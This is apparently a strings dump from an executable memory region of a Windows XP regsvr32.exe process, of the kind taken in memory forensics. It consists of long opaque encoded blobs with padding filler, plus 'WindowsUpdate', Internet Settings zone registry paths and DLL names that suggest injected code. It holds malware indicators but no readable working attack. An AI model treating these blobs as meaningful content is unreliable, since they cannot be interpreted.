VtocONi90cFUoFoXY6RhpvOVQlUqLagtkcYN4HfQeRJJnPZ4npyD7TjUOYK8HMm1lCl4tuWqIQNmADXKjY1sNHvxynAX0toNiSaTz5ZlvvO87TaqumHod4dUj1Vioa5L78vZeDZ1eVzDxmzqvuP8daJqRWFj9CfAgB00QyaO68z1RPs69eBTWYenvQhhWLnECcsUo9Oo/7yVD54qXddSedf4FF0Y1phD5wri6KjGEsaGJfwVUKC/dmEK5nPlA7F7KlxItFk 5rTseZVu6AKTgI7ALW2aIMIm65ze4R9tX7QmZIP6kUatdcPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD

UhU%D

UhU%D

C8awVgMXV9vSi1BFF84c4B2LLj3ZyoV2Qb4Cp1fjeXzNbuE C/NOeyDxEiWq KAKYpcDw0MN03HLvP X68Twy06sJD1a75Ix8ZYYtMfBzG6bOl2S055vgBpGXePBPy10 EE5/nPwqFfmma5P SWmtr/unuKTXz3CYHDqU7l04vA3nXuBxiR/H3300uMmNOd8rckhl/27CFO7Z/7wb3 ckg3vq5FyOm638bm3E6xPWpHzNe ekY CNkDYMxZSenzqz d2OWvy610ctvP/4zfbwjyPnV7OyUjNNsd884gq1UeBxNtTA4Gq01CNaR2WFJNroUacP4rF7rnvztggNjxANsE26EK8zhbRSm2xw9YVXBamCQU0CoOu9kYQsbABXh16aiRnvvPrGd/Pk64B5Ijsf66Yg/ 24sKlRuKdfiRj8Cu5TbL8HFAcfx9uSaayN0nIU8Cb/F8g1mzX4pCpnBmj7AL/uqsEuLAtuxgH0DgSqz3UN mIFAT8fXXaIXDUBIy12Pa7W2cJQTgGvC0KO4Z8D5Q1XNS2/uZum9rLEICYOgm/uSfXNrWcrXL67xe3ES/R1im56DGnpzcD79NLxL08H7gXnk4IIGAU4hPLZmmLkiZdSK3ea9J8NLKwIZIGQ5GtCYIhNo8mswzlWe9HCuJvkElVO7Yn4firX/XB0roU 4 7lg5mVGHbYn Cde1V2MF1NG01/0LdhDueGifdOrz/upnRDyYtEA7qWAYQKzTkLRXXoexX4yz9cq6oKaJYxYFneIahOS43IkirG30vhiq29S TDiokA90t1//u9iUC8MeJ54PQ/QHGxU 33lAgQWcxZqV92qxprubwz6CE0aH0wSHG7pZSu5oMJB YAFZ5fCSnrM7jDUVG4j72D5jw2r1Xf 8AZ qDVdkW1jtIBOVU5UcEya3fLYAHNsvrmxxMYy1TyAaEJ7z2h6 OXmyl9bjMQZHu31V39G/DrYWAQL VxL6btazkFp9n2jWGravH9bmxx UVMMlwNoqyrpKRMMKw2/yTs7qd/GXOqKBUiGBQVfVNZ/rSJXBEnmWwT21RpMP/hrF AYwqKRJfbMup1h6Ousk0MTCddz9p1n9 peAAf8565VJFRi7kksOaVEt15YJ2LF4TmU/wcq6P6WAIC2PspbhW7Wu V5 gDjujIbqzreSGBdA/iaZwk2OtJxu2/e3rw6aCHXBywbAOazkvdgWPDXufcHybYGGWGHBkrnfWNzIAkaPCaDVouiMguIXr8KDSG1 4xlQ5x6v8mWkekwNcSstXZH4D1TGyPch2pINQtU56LFJQg3m27IuVDKfzakcOrsbqq6Qixgcq1IIdHX533uSfnOA58SEofj6eaJuetab15SRYn9HJW4Hobv2VAwdyoTxwnshUx0yNUgiQEzvAZzn xhTgaVCN/WAd3/ahucI/ioTaSIF5uJXMCyzokd8k/2YYDVRDIdNzEbUxwLg4H GLyo37d29wqznvhkfttKuwM62BVwfzzNFX RdhHu5DX4Qqz5U IZaTNSPsXQYSpZHnJtcYtl7fgkBpD9Ezl4FwN8YDZrPTSiZ94GfMNxsm2T2ahGmEi9AQi8J6Yb3JrWYjo5poeNjXvqY0b2TVygFXorynEgAah3J7tDepAP3B10vauooVjTlhHaqUFinkbgfbMdpPjleeIX9/or5vH8S/mPCCkfvu7/sdhUaAcYqaMBZgS9fmlEp8HnwyPnzp1UcK3gw1bsWDBjd4cLdODm5FXiPV8Ae8zUjBgU8KdSzVbA2GNJDnrpcChLB7nDyu2dQuF5YipF1/SOfIqtqqtoYHSN5wlqlKf27DyUkUtWs 0wofei4spsC43YMDMK FelI6vkxSrpYvFR/L4EuoZayxGGz u50U8SHnlq6f3BJ1CYaWoWPu/6ZFx2ctY9B7p5FGMyx7Wh7RudN1CPb3nRnjcdipok1y5rYJuy6fTDe94/W1n4O5gMBKI3ENQGro28P/zequsQ/2NwHygdQ jgYIM/0cjBReqXqGdonn8TSJQvTPQoG1BM5BHm4iQ0dHCGCxULBYXKCsIQ6EQ22gEweFwCIIiZ44Hb4iwmWYNrfGOg6/CmBCmW8lNPuryYHm7R72So5e0ix7AV7yCD7SKiNxPkA/01bPbd7MkZJMdZj8EZ Dha2IU0RFMEQmLi9pmk0 EiDEXNN5lLbfqScHFc/x4B8fsziFj4IxcSYnyXgsvZhXxY5WekEhLY0RrAFBMcHfQIH PqN6mudOAAIcMZoY0wgTRt1toBvUDESld18WNHj6TQEczXGrsFI/KIiuK69pf6wpDgoM0ilDTEnRWvbjJug0ZB8ASU/WsU3zh7j9USRdqvlCyUj GCpwR49iaWQUc6fMXGzIbAJHAAcCGV6Ed3ohqn/uxdZvCO25Kw Yp9dbBjoVjaB3zTz9bXdNM/JF0mzn54N0VYndNaMUroohblm4FAikvOuNXq/4HJHnlKx8JZy f4bJRxIG4poNfiSOxJst5nSlRJvBaVQk89xZwyeKsPv80JsloB5uWywvBWUd1MLqZW3/o0uPiRjnjdF6BVHvomGIBbX RFJsqnJM3FBRnRXJyx9uzlSqtxq1HgoXyjXRatjnwgQXs ID05Y5YGBBggeX vNcnvT1DOCCKtM6nkr5uXfQO00Ez3lp8qss81ISqaqvYgKhXjOpE4t0ThZ4nu5MjNhAEftZun28J5QM92Fg1sA EvS1WGYOesYnyTmz8y770nhYKU1gY8e/GZvspTsmFOJTLjPuZUOnmmvKWRobkP7JHilnL/XEOR4yzUKO4cpVlTVhFHdn4i0Qn7RACJB5Gc6WLhFPClvQEtPnjfKCC/ST8BN6AJScAh0zPU0X59YHxuT z5kKgAPXXA22AEJ6zNx0hV3ewiy RFxf9c Y6tfIMVqPaTITuFAFdbiiVfGOcyCpTN7XYerPwHfwECzrYKl2jW5NlrL/hhAblyx1hk6s9fqgAu/o4WWPSGpQXNcFC776mAU8bDbNpXofn8E6FDDr u4yEGxvo0T//sSFPe6XSFaqghapw1qfP6Ux2BEi7FAgd5nTrSUx2lwv/wfceypmnNkPyIVsk6ldWavqpqlvIBVS5/gI E 93dGOMQk8K6LCD/ql9cO287As1dvh5/DOJYxf2EAYhJsDkxDXkeot9GR4RYi4c8Lc9 U7liHzFxM 9qy9Xa 9jqWC19zpc/oCGwAmtJhIPAXIHBxZU4G3 pq ftM0xVl2FqGb1t5Zd c9lTRTKUV/5uos67xmcb3c1XfbASM76pi QLxawj/mnyqRxlDKM3pK Gx0CgaNjbbu cABFOlvJOuWliPDcC4mVja/VS3zfDuuwwhiFceS1zCk1h6FwALzKzFgZ1LCl7z 9aukYU06l4jXGe9X3ZLWPFxau4kw4t qc5WeOMwrYM5gx3pOsTjgd8VsZVfxtcSy wYWn9YShV2lca4tssiibvIyva3BaKxn 1bU ai0YWx5bseionczjkQIgrnL8PIz4vuflDIKEt OlS7hgjAft/cxJvkehsIYUa7kxzzUGIi/x8wZUL2mqkeYB45nYa2kOWooEwp9JorttoNsycTGjk12CBo8Rv/7v04thxVKjsPjIFVIwWTnFd6vFhugyYSgcOAkpvVFdQ3RUqbsPMptQeYA3eaB86c9vJ6OLbfiGs3VqkB1VHXSsrGbsvC GTtBPf0/aiPQovV06ozR2nkJyLw8hsqwBoiREYRjpsDIYIjJTeULjuCnGJKAEL1dCAJduTPcwbJMse1OQUifr/JTMGmgrDoDI7odfihQ4CC 74HVfXdBIJVCtLFroThFXRQQWYFzal7mWkI74eYWGo665IqJvQkYLqReZ9M6TZCh4pW2G7DF0ieIar8LM7nWBx3r0hULzBAqpISOtyY0qfHWoa5Kh1MH /KCEe8sUJwLW2skyab23Op6YvEIoq N9venHZwIp1FZ2CY R0FILJBiHLZtOBxk5UWug0Vcw55sEa5ZoxGdXraYTrrBQnM3FqHndNyUHM6PO7A4RwC10a9izcZL0MHda9wArqA82Om3PwbfNW bWbuI C9bwYusUrdTYWpd lJ1IykioG4M4thh9E7f5JA56i6vs8ObsGzUBurMpdy9p8E7fq6MiLsiLa3/ bMXprvN7j0EAr9SerDSB9a5miF4rjQYfPTn3lP0aDYmZAYhDTphNKp01B/ohxl4tWblFTYI0GFR8oFdPUlyt8PAVr/GyicqZ1EVZOr/h65h2pRnhdUGsZ4aHm08P8mY UlaCHQovzC3pBYskCa88lH8jHCrFxJFyrXY91XIIiLqKqCW3Y7VPudBoulL nENDvpGqsx57qMZvwSVrnCnXwTmaJDLcRplzCOe1YUUp7db4HF7gMrp1KbLcHmo08Msvr7QvQ42VdZphTZEdtXgbmoz4yqZRhIB6MBS7J6/NgspVWqnU j0egcHeir5hHhOQz0KqKoyk9whA5l9IHu3enmEAp9uqhcNoVU/JymPa7vB auqMC2Tkq5LJqSpBnuV81pj9sHoEu46Sh/8d LctuPOLP/NRxerYnZmLNubaAW7pfmylP8RTuz2RkmlPgpI4y3lu09/4DUpdH4K1zsCLA3MKmSrr5QdqbgKb3utFFdA43ePIfpubeIhDHl 7MyZF6fj36fFUMwBSytOxIAhuIfB5BatsycIMnWyaIODri9eWy9f0gRDXyXLhZu2a8oy4ngDy5RccgzdSA3r5gPVq1DcARbFBf7q0nZ8QLExq7L5SWkmk1kt7RQsw0o3ILxDVA5gjGH41XRkT0J43IlQAqeKkopfWtTS3itROAEPXMqiBob7qsJhL2d7/JE/XfLi3WSIZDQsXTVkraSUB xSwYXQpm/AoEYkjg w6po yADwHGv4XrTvUW663W Lk69OiSiEr3WjBPvMEsTculhoSsqd5tGybb6cPc5L8HBkCFYm42taYz5lH/ivaFlarLR2jJNWQGzsOD8gOEbt02DBeFxgd6K/G5/SAk35IKSTnv9GMWiZaVw5UKKF8uPfjEM3C44rW0wUWuXOoB5e434 XsaP2f6SaZB3O9wM/onOlT7S8XLm7wA1y6TOri HP67EDVdiz88xqvW8vZA5ZRUzAr2g1rNIaNr58NK3b2Zb061jrq9RleL9SfbUhD1j2B3qM1U8UWUMyV2WyFk U6dY Vk3bKm9mp3eN7x93uFzNdNWoQRioQDIPncqo6X/vk4Sn84sjTkuL4unL2P2Syb6W3AqVMuZP8MZJpKwKZVK2BOVFEe6AthPBY5E6ppjZXQZAX QQlduP7P8OnBe bzro3D5O6ik6sE0BuDHsigH/XFEo5SD/UKpipt1zQ11EPjOhmv6dC1vSzbLNnEs5HqvkoR8VbycEtwuQnbrKmNwU0Sp4AeWVgbBdnrE5xzDmwwOrb8RLf4uRdDA zvyp3YIUEdbFClyI23sYMzZeerviJKmli5sKAggtA156MBwy9X/My1znXqE4CN2WHGw98w3J29lYdy7qdrdr7aGfFNmLSRsYrLyI02yQztq851Q4eXQrm5xFP8c2/QaWoPF7Z6ob qAhvzrQwZlYBD0h31As6eIoGOjyFxafA0VSbup8aGEVwQObH2KIMEWFWzgS3JdHf7qeddf0PdbwhZSYGJNhAfgZ289xjomb9SFLC6Vk4bqWrtBvwDi5Czg7IZWpeJCSmtArzWeI7d TJDIxqe/fbzTPcpwmrvaEonoVpehdPpV1MQskviMtIE3Z5SW5JgLrgs3E2uVBhDgS8HTlM0QUql1obCFr5z2BdK22XoIHAWC cmO0tstqUbrq/8KwSEcRPzEH12ecc fNtVTp/vuJlHs3jUQj13JKP774TjCiTaRNW1Aaz4vw1O1JKUW5J4CJ80TjsBKRIPI6/eHJEo6j1Vjkvifhco5D2pO3u6brdl3IXn2 y/un7ls5fOeCOxd20OhKjLfonN6gpamBjg5aTMF3HxJCKkV6f2P/DY78GJky1PMRq9eH0K3GLxNAXKinpfumKxCOw6YXADqtFJP5zaZEScGB0JpdHQoTZN4rIXdVfPFMzY9WTdVGLZFR8rJZsTfrXjjgTAwX808MmwMADEd ImzwqbwsVElFZdYpIWhPNTJ7dQlAtH3TxogwAoqXyhgN89aKS22cu2INrv88EzRacDX6JsuC/OwbB036BxOKMOWbTszedY5Z01rxrpinmcY1hhQ3dR/Tm34IAqK9es49Eq4mWsYLS EvDfwMZG6jVTFZ56aUqdpnTT65dtypBA0j3/FxoK8CsWoTEfpiWdzXsTxjusrVSL5Xcmm49fmZekYH1T/fYQvwb6wHs51d9t0GaRO6JFLMOY7BNAAXiQ3uFj0nXC0uPaAD0CTAgwZU8BBM/PE9ZsZHdjbVPlbKZkd LMkQIdF60X9 PA2SkRhSMVguUVWfqP0DoklC7dc9g0bUsUVK0ngMjMbjsGsV4XuwprrJ xZgn93uPe0k5TWrizXLSvWkpe779CdGRa BH/NoP6jPKdgn9SNCBvTuLyaLI6E7sNu WjWOQzXP/n31Y9Yx7wg5DWeOKPHQhz0v7Tv4OFuiCYr5cLLTyQHOcttcQxtlHx6i3WfZ1IhhMmM7sSwQrBSg/immXJmf73xxfdzZZaxbqitMIO3EUjfOwLSb/92m3Ma6zGguU/ZhLSuRF7H3IRgHGj2zUal1eyopZvpqoDLXACLiBjK G5DTHc7qze8Aq9wbxOp8z8IMU5/TyDuayY9LfsSKp6V9xFRCfXLKFwz23W 1q8OGAMYX74Be Fu3dwEW2tT9mGHflTbsjXRteUDBsAViTteWkGnZ7qTLlqfK7u8W0UNdvQSBQ8V32tKUYUa li8XWA7E qhyHptmW/ryVqALJtfA5mRG/6NnqfqmOFS8ACGKtbbgBBVSXbJnU02mBNLs9APkC iNSbH/45SkXEWyTuj/v0WfhBEqZ4csZsedP4sTCrp6SqQ5LGavvbL/Jroeiq4/wkk9jDjb24vDL1hvP8RbKkxGft2If8ByHeacQrDP6ing2aeh4QJWyTyv7Izwl8rx0rdN8Ctg4tPnViU hCRqlK AnenBy0oj9iuJMQGLjfTeMmfTYhX VtocONi90cFUoFoXY6RhpvOVQlUqLagtkcYN4HfQeRJJnPZ4npyD7TjUOYK8HMm1lCl4tuWqIQNmADXKjY1sNHvxynAX0toNiSaTz5ZlvvO87TaqumHod4dUj1Vioa5L78vZeDZ1eVzDxmzqvuP8daJqRWFj9CfAgB00QyaO68z1RPs69eBTWYenvQhhWLnECcsUo9Oo/7yVD54qXddSedf4FF0Y1phD5wri6KjGEsaGJfwVUKC/dmEK5nPlA7F7KlxItFk 5rTseZVu6AKTgI7ALW2aIMIm65ze4R9tX7QmZIP6kUatdcPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1

C8awVgMXV9vSi1BFF84c4B2LLj3ZyoV2Qb4Cp1fjeXzNbuE C/NOeyDxEiWq KAKYpcDw0MN03HLvP X68Twy06sJD1a75Ix8ZYYtMfBzG6bOl2S055vgBpGXePBPy10 EE5/nPwqFfmma5P SWmtr/unuKTXz3CYHDqU7l04vA3nXuBxiR/H3300uMmNOd8rckhl/27CFO7Z/7wb3 ckg3vq5FyOm638bm3E6xPWpHzNe ekY CNkDYMxZSenzqz d2OWvy610ctvP/4zfbwjyPnV7OyUjNNsd884gq1UeBxNtTA4Gq01CNaR2WFJNroUacP4rF7rnvztggNjxANsE26EK8zhbRSm2xw9YVXBamCQU0CoOu9kYQsbABXh16aiRnvvPrGd/Pk64B5Ijsf66Yg/ 24sKlRuKdfiRj8Cu5TbL8HFAcfx9uSaayN0nIU8Cb/F8g1mzX4pCpnBmj7AL/uqsEuLAtuxgH0DgSqz3UN mIFAT8fXXaIXDUBIy12Pa7W2cJQTgGvC0KO4Z8D5Q1XNS2/uZum9rLEICYOgm/uSfXNrWcrXL67xe3ES/R1im56DGnpzcD79NLxL08H7gXnk4IIGAU4hPLZmmLkiZdSK3ea9J8NLKwIZIGQ5GtCYIhNo8mswzlWe9HCuJvkElVO7Yn4firX/XB0roU 4 7lg5mVGHbYn Cde1V2MF1NG01/0LdhDueGifdOrz/upnRDyYtEA7qWAYQKzTkLRXXoexX4yz9cq6oKaJYxYFneIahOS43IkirG30vhiq29S TDiokA90t1//u9iUC8MeJ54PQ/QHGxU 33lAgQWcxZqV92qxprubwz6CE0aH0wSHG7pZSu5oMJB YAFZ5fCSnrM7jDUVG4j72D5jw2r1Xf 8AZ qDVdkW1jtIBOVU5UcEya3fLYAHNsvrmxxMYy1TyAaEJ7z2h6 OXmyl9bjMQZHu31V39G/DrYWAQL VxL6btazkFp9n2jWGravH9bmxx UVMMlwNoqyrpKRMMKw2/yTs7qd/GXOqKBUiGBQVfVNZ/rSJXBEnmWwT21RpMP/hrF AYwqKRJfbMup1h6Ousk0MTCddz9p1n9 peAAf8565VJFRi7kksOaVEt15YJ2LF4TmU/wcq6P6WAIC2PspbhW7Wu V5 gDjujIbqzreSGBdA/iaZwk2OtJxu2/e3rw6aCHXBywbAOazkvdgWPDXufcHybYGGWGHBkrnfWNzIAkaPCaDVouiMguIXr8KDSG1 4xlQ5x6v8mWkekwNcSstXZH4D1TGyPch2pINQtU56LFJQg3m27IuVDKfzakcOrsbqq6Qixgcq1IIdHX533uSfnOA58SEofj6eaJuetab15SRYn9HJW4Hobv2VAwdyoTxwnshUx0yNUgiQEzvAZzn xhTgaVCN/WAd3/ahucI/ioTaSIF5uJXMCyzokd8k/2YYDVRDIdNzEbUxwLg4H GLyo37d29wqznvhkfttKuwM62BVwfzzNFX RdhHu5DX4Qqz5U IZaTNSPsXQYSpZHnJtcYtl7fgkBpD9Ezl4FwN8YDZrPTSiZ94GfMNxsm2T2ahGmEi9AQi8J6Yb3JrWYjo5poeNjXvqY0b2TVygFXorynEgAah3J7tDepAP3B10vauooVjTlhHaqUFinkbgfbMdpPjleeIX9/or5vH8S/mPCCkfvu7/sdhUaAcYqaMBZgS9fmlEp8HnwyPnzp1UcK3gw1bsWDBjd4cLdODm5FXiPV8Ae8zUjBgU8KdSzVbA2GNJDnrpcChLB7nDyu2dQuF5YipF1/SOfIqtqqtoYHSN5wlqlKf27DyUkUtWs 0wofei4spsC43YMDMK FelI6vkxSrpYvFR/L4EuoZayxGGz u50U8SHnlq6f3BJ1CYaWoWPu/6ZFx2ctY9B7p5FGMyx7Wh7RudN1CPb3nRnjcdipok1y5rYJuy6fTDe94/W1n4O5gMBKI3ENQGro28P/zequsQ/2NwHygdQ jgYIM/0cjBReqXqGdonn8TSJQvTPQoG1BM5BHm4iQ0dHCGCxULBYXKCsIQ6EQ22gEweFwCIIiZ44Hb4iwmWYNrfGOg6/CmBCmW8lNPuryYHm7R72So5e0ix7AV7yCD7SKiNxPkA/01bPbd7MkZJMdZj8EZ Dha2IU0RFMEQmLi9pmk0 EiDEXNN5lLbfqScHFc/x4B8fsziFj4IxcSYnyXgsvZhXxY5WekEhLY0RrAFBMcHfQIH PqN6mudOAAIcMZoY0wgTRt1toBvUDESld18WNHj6TQEczXGrsFI/KIiuK69pf6wpDgoM0ilDTEnRWvbjJug0ZB8ASU/WsU3zh7j9USRdqvlCyUj GCpwR49iaWQUc6fMXGzIbAJHAAcCGV6Ed3ohqn/uxdZvCO25Kw Yp9dbBjoVjaB3zTz9bXdNM/JF0mzn54N0VYndNaMUroohblm4FAikvOuNXq/4HJHnlKx8JZy f4bJRxIG4poNfiSOxJst5nSlRJvBaVQk89xZwyeKsPv80JsloB5uWywvBWUd1MLqZW3/o0uPiRjnjdF6BVHvomGIBbX RFJsqnJM3FBRnRXJyx9uzlSqtxq1HgoXyjXRatjnwgQXs ID05Y5YGBBggeX vNcnvT1DOCCKtM6nkr5uXfQO00Ez3lp8qss81ISqaqvYgKhXjOpE4t0ThZ4nu5MjNhAEftZun28J5QM92Fg1sA EvS1WGYOesYnyTmz8y770nhYKU1gY8e/GZvspTsmFOJTLjPuZUOnmmvKWRobkP7JHilnL/XEOR4yzUKO4cpVlTVhFHdn4i0Qn7RACJB5Gc6WLhFPClvQEtPnjfKCC/ST8BN6AJScAh0zPU0X59YHxuT z5kKgAPXXA22AEJ6zNx0hV3ewiy RFxf9c Y6tfIMVqPaTITuFAFdbiiVfGOcyCpTN7XYerPwHfwECzrYKl2jW5NlrL/hhAblyx1hk6s9fqgAu/o4WWPSGpQXNcFC776mAU8bDbNpXofn8E6FDDr u4yEGxvo0T//sSFPe6XSFaqghapw1qfP6Ux2BEi7FAgd5nTrSUx2lwv/wfceypmnNkPyIVsk6ldWavqpqlvIBVS5/gI E 93dGOMQk8K6LCD/ql9cO287As1dvh5/DOJYxf2EAYhJsDkxDXkeot9GR4RYi4c8Lc9 U7liHzFxM 9qy9Xa 9jqWC19zpc/oCGwAmtJhIPAXIHBxZU4G3 pq ftM0xVl2FqGb1t5Zd c9lTRTKUV/5uos67xmcb3c1XfbASM76pi QLxawj/mnyqRxlDKM3pK Gx0CgaNjbbu cABFOlvJOuWliPDcC4mVja/VS3zfDuuwwhiFceS1zCk1h6FwALzKzFgZ1LCl7z 9aukYU06l4jXGe9X3ZLWPFxau4kw4t qc5WeOMwrYM5gx3pOsTjgd8VsZVfxtcSy wYWn9YShV2lca4tssiibvIyva3BaKxn 1bU ai0YWx5bseionczjkQIgrnL8PIz4vuflDIKEt OlS7hgjAft/cxJvkehsIYUa7kxzzUGIi/x8wZUL2mqkeYB45nYa2kOWooEwp9JorttoNsycTGjk12CBo8Rv/7v04thxVKjsPjIFVIwWTnFd6vFhugyYSgcOAkpvVFdQ3RUqbsPMptQeYA3eaB86c9vJ6OLbfiGs3VqkB1VHXSsrGbsvC GTtBPf0/aiPQovV06ozR2nkJyLw8hsqwBoiREYRjpsDIYIjJTeULjuCnGJKAEL1dCAJduTPcwbJMse1OQUifr/JTMGmgrDoDI7odfihQ4CC 74HVfXdBIJVCtLFroThFXRQQWYFzal7mWkI74eYWGo665IqJvQkYLqReZ9M6TZCh4pW2G7DF0ieIar8LM7nWBx3r0hULzBAqpISOtyY0qfHWoa5Kh1MH /KCEe8sUJwLW2skyab23Op6YvEIoq N9venHZwIp1FZ2CY R0FILJBiHLZtOBxk5UWug0Vcw55sEa5ZoxGdXraYTrrBQnM3FqHndNyUHM6PO7A4RwC10a9izcZL0MHda9wArqA82Om3PwbfNW bWbuI C9bwYusUrdTYWpd lJ1IykioG4M4thh9E7f5JA56i6vs8ObsGzUBurMpdy9p8E7fq6MiLsiLa3/ bMXprvN7j0EAr9SerDSB9a5miF4rjQYfPTn3lP0aDYmZAYhDTphNKp01B/ohxl4tWblFTYI0GFR8oFdPUlyt8PAVr/GyicqZ1EVZOr/h65h2pRnhdUGsZ4aHm08P8mY UlaCHQovzC3pBYskCa88lH8jHCrFxJFyrXY91XIIiLqKqCW3Y7VPudBoulL nENDvpGqsx57qMZvwSVrnCnXwTmaJDLcRplzCOe1YUUp7db4HF7gMrp1KbLcHmo08Msvr7QvQ42VdZphTZEdtXgbmoz4yqZRhIB6MBS7J6/NgspVWqnU j0egcHeir5hHhOQz0KqKoyk9whA5l9IHu3enmEAp9uqhcNoVU/JymPa7vB auqMC2Tkq5LJqSpBnuV81pj9sHoEu46Sh/8d LctuPOLP/NRxerYnZmLNubaAW7pfmylP8RTuz2RkmlPgpI4y3lu09/4DUpdH4K1zsCLA3MKmSrr5QdqbgKb3utFFdA43ePIfpubeIhDHl 7MyZF6fj36fFUMwBSytOxIAhuIfB5BatsycIMnWyaIODri9eWy9f0gRDXyXLhZu2a8oy4ngDy5RccgzdSA3r5gPVq1DcARbFBf7q0nZ8QLExq7L5SWkmk1kt7RQsw0o3ILxDVA5gjGH41XRkT0J43IlQAqeKkopfWtTS3itROAEPXMqiBob7qsJhL2d7/JE/XfLi3WSIZDQsXTVkraSUB xSwYXQpm/AoEYkjg w6po yADwHGv4XrTvUW663W Lk69OiSiEr3WjBPvMEsTculhoSsqd5tGybb6cPc5L8HBkCFYm42taYz5lH/ivaFlarLR2jJNWQGzsOD8gOEbt02DBeFxgd6K/G5/SAk35IKSTnv9GMWiZaVw5UKKF8uPfjEM3C44rW0wUWuXOoB5e434 XsaP2f6SaZB3O9wM/onOlT7S8XLm7wA1y6TOri HP67EDVdiz88xqvW8vZA5ZRUzAr2g1rNIaNr58NK3b2Zb061jrq9RleL9SfbUhD1j2B3qM1U8UWUMyV2WyFk U6dY Vk3bKm9mp3eN7x93uFzNdNWoQRioQDIPncqo6X/vk4Sn84sjTkuL4unL2P2Syb6W3AqVMuZP8MZJpKwKZVK2BOVFEe6AthPBY5E6ppjZXQZAX QQlduP7P8OnBe bzro3D5O6ik6sE0BuDHsigH/XFEo5SD/UKpipt1zQ11EPjOhmv6dC1vSzbLNnEs5HqvkoR8VbycEtwuQnbrKmNwU0Sp4AeWVgbBdnrE5xzDmwwOrb8RLf4uRdDA zvyp3YIUEdbFClyI23sYMzZeerviJKmli5sKAggtA156MBwy9X/My1znXqE4CN2WHGw98w3J29lYdy7qdrdr7aGfFNmLSRsYrLyI02yQztq851Q4eXQrm5xFP8c2/QaWoPF7Z6ob qAhvzrQwZlYBD0h31As6eIoGOjyFxafA0VSbup8aGEVwQObH2KIMEWFWzgS3JdHf7qeddf0PdbwhZSYGJNhAfgZ289xjomb9SFLC6Vk4bqWrtBvwDi5Czg7IZWpeJCSmtArzWeI7d TJDIxqe/fbzTPcpwmrvaEonoVpehdPpV1MQskviMtIE3Z5SW5JgLrgs3E2uVBhDgS8HTlM0QUql1obCFr5z2BdK22XoIHAWC cmO0tstqUbrq/8KwSEcRPzEH12ecc fNtVTp/vuJlHs3jUQj13JKP774TjCiTaRNW1Aaz4vw1O1JKUW5J4CJ80TjsBKRIPI6/eHJEo6j1Vjkvifhco5D2pO3u6brdl3IXn2 y/un7ls5fOeCOxd20OhKjLfonN6gpamBjg5aTMF3HxJCKkV6f2P/DY78GJky1PMRq9eH0K3GLxNAXKinpfumKxCOw6YXADqtFJP5zaZEScGB0JpdHQoTZN4rIXdVfPFMzY9WTdVGLZFR8rJZsTfrXjjgTAwX808MmwMADEd ImzwqbwsVElFZdYpIWhPNTJ7dQlAtH3TxogwAoqXyhgN89aKS22cu2INrv88EzRacDX6JsuC/OwbB036BxOKMOWbTszedY5Z01rxrpinmcY1hhQ3dR/Tm34IAqK9es49Eq4mWsYLS EvDfwMZG6jVTFZ56aUqdpnTT65dtypBA0j3/FxoK8CsWoTEfpiWdzXsTxjusrVSL5Xcmm49fmZekYH1T/fYQvwb6wHs51d9t0GaRO6JFLMOY7BNAAXiQ3uFj0nXC0uPaAD0CTAgwZU8BBM/PE9ZsZHdjbVPlbKZkd LMkQIdF60X9 PA2SkRhSMVguUVWfqP0DoklC7dc9g0bUsUVK0ngMjMbjsGsV4XuwprrJ xZgn93uPe0k5TWrizXLSvWkpe779CdGRa BH/NoP6jPKdgn9SNCBvTuLyaLI6E7sNu WjWOQzXP/n31Y9Yx7wg5DWeOKPHQhz0v7Tv4OFuiCYr5cLLTyQHOcttcQxtlHx6i3WfZ1IhhMmM7sSwQrBSg/immXJmf73xxfdzZZaxbqitMIO3EUjfOwLSb/92m3Ma6zGguU/ZhLSuRF7H3IRgHGj2zUal1eyopZvpqoDLXACLiBjK G5DTHc7qze8Aq9wbxOp8z8IMU5/TyDuayY9LfsSKp6V9xFRCfXLKFwz23W 1q8OGAMYX74Be Fu3dwEW2tT9mGHflTbsjXRteUDBsAViTteWkGnZ7qTLlqfK7u8W0UNdvQSBQ8V32tKUYUa li8XWA7E qhyHptmW/ryVqALJtfA5mRG/6NnqfqmOFS8ACGKtbbgBBVSXbJnU02mBNLs9APkC iNSbH/45SkXEWyTuj/v0WfhBEqZ4csZsedP4sTCrp6SqQ5LGavvbL/Jroeiq4/wkk9jDjb24vDL1hvP8RbKkxGft2If8ByHeacQrDP6ing2aeh4QJWyTyv7Izwl8rx0rdN8Ctg4tPnViU hCRqlK AnenBy0oj9iuJMQGLjfTeMmfTYhX VtocONi90cFUoFoXY6RhpvOVQlUqLagtkcYN4HfQeRJJnPZ4npyD7TjUOYK8HMm1lCl4tuWqIQNmADXKjY1sNHvxynAX0toNiSaTz5ZlvvO87TaqumHod4dUj1Vioa5L78vZeDZ1eVzDxmzqvuP8daJqRWFj9CfAgB00QyaO68z1RPs69eBTWYenvQhhWLnECcsUo9Oo/7yVD54qXddSedf4FF0Y1phD5wri6KjGEsaGJfwVUKC/dmEK5nPlA7F7KlxItFk 5rTseZVu6AKTgI7ALW2aIMIm65ze4R9tX7QmZIP6kUatdcPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1

WindowsUpdate

WindowsUpdate

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

regsvr32.exe_304_rwx_01000000_00005000:

.text

.text

`.data

`.data

.rsrc

.rsrc

msvcrt.dll

msvcrt.dll

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

USER32.dll

USER32.dll

ole32.dll

ole32.dll

regsvr32.pdb

regsvr32.pdb

_wcmdln

_wcmdln

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

Excessive # of DLL's on cmdline

Excessive # of DLL's on cmdline

5.1.2600.5512 (xpsp.080413-2105)

5.1.2600.5512 (xpsp.080413-2105)

REGSVR32.EXE

REGSVR32.EXE

Windows

Windows

Operating System

Operating System

